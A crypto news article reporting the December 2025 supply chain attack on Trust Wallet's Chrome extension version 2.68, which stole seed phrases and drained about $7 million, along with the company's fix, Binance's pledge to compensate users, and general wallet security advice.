Hundreds of Trust Wallet users have been hit by a devastating security breach that drained a total of $7 million in crypto assets due to a compromised browser extension update.
Key Takeaways
- Version 2.68 of the Trust Wallet Chrome extension was infected with malicious code that stole users’ seed phrases.
- The exploit resulted in losses of over $7 million, mostly in SOL, EVM tokens, and BTC.
- Trust Wallet urged users to upgrade to version 2.69 immediately to prevent further losses.
- Binance founder Changpeng Zhao confirmed all affected users will be fully compensated.
What Happened?
A supply chain attack on Trust Wallet’s browser extension version 2.68 allowed hackers to siphon millions in digital assets by tricking users into entering their seed phrases into a compromised interface. Once entered, funds were swiftly transferred to unknown wallets. The breach impacted hundreds of users and occurred during the holiday season, intensifying frustration and losses.
We’ve identified a security incident affecting Trust Wallet Browser Extension version 2.68 only. Users with Browser Extension 2.68 should disable and upgrade to 2.69.
— Trust Wallet (@TrustWallet) December 25, 2025
Please refer to the official Chrome Webstore link here: https://t.co/V3vMq31TKb
Please note: Mobile-only users…
A Coordinated Supply Chain Attack
The attack was first flagged by blockchain investigator ZachXBT, who identified a sudden wave of wallet drains. Cybersecurity researcher Akinator traced the source to malicious code hidden in the latest Chrome extension update. This code secretly redirected seed phrase data to a phishing domain, metrics-trustwallet․com, which has since been taken offline.
- The rogue version, 2.68, was released on December 24, 2025.
- Once a seed phrase was entered, funds were automatically stolen in minutes.
- Over 40% of stolen funds were in SOL, followed by 35% in EVM tokens and 25% in BTC.
Only users of the affected browser extension were impacted. Trust Wallet mobile apps remained secure.
Binance and Trust Wallet Respond
Trust Wallet developers quickly issued version 2.69 and advised all users to immediately disable the compromised version. A guide was published to help users update safely. Binance founder and Trust Wallet owner Changpeng Zhao (CZ) posted on X:
So far, $7m affected by this hack. @TrustWallet will cover. User funds are SAFU. Appreciate your understanding for any inconveniences caused. 🙏
— CZ 🔶 BNB (@cz_binance) December 26, 2025
The team is still investigating how hackers were able to submit a new version. https://t.co/xdPGwwDU8b
He also confirmed that all affected users will be fully reimbursed.
Meanwhile, analytics group Lookonchain tracked $4.2 million of the stolen funds already moving through crypto exchanges including ChangeNOW, FixedFloat, KuCoin, and HTX.
Larger Security Concerns in Crypto
This breach arrives in the wake of several crypto security issues:
- Earlier this month, Polymarket faced account breaches due to a third-party vulnerability.
- On Christmas Day, Binance saw a flash crash of BTC-USD1 to $24,000 due to issues with the USD1 stablecoin, tied to World Liberty Financial, which has links to the Trump family.
- Chainalysis reports that hackers have stolen over $3.4 billion in crypto so far in 2025.
Experts like Vladimir S. described the Trust Wallet incident as a supply chain attack, stressing the need for wallet developers to maintain tighter control over software updates.
CoinLaw’s Takeaway
Honestly, this kind of exploit makes me double down on my own crypto security habits. In my experience, browser extensions are a weak link in crypto custody. This breach is a wake-up call. I’ve always recommended using hardware wallets for storing significant amounts, and this only reinforces that. Trust Wallet’s fast response and CZ’s commitment to compensation are good signs, but it doesn’t undo the damage done to user trust. If you’re in crypto, never type your seed phrase unless you’re 100 percent sure the environment is secure.
Hover or focus to see the definition of the term.
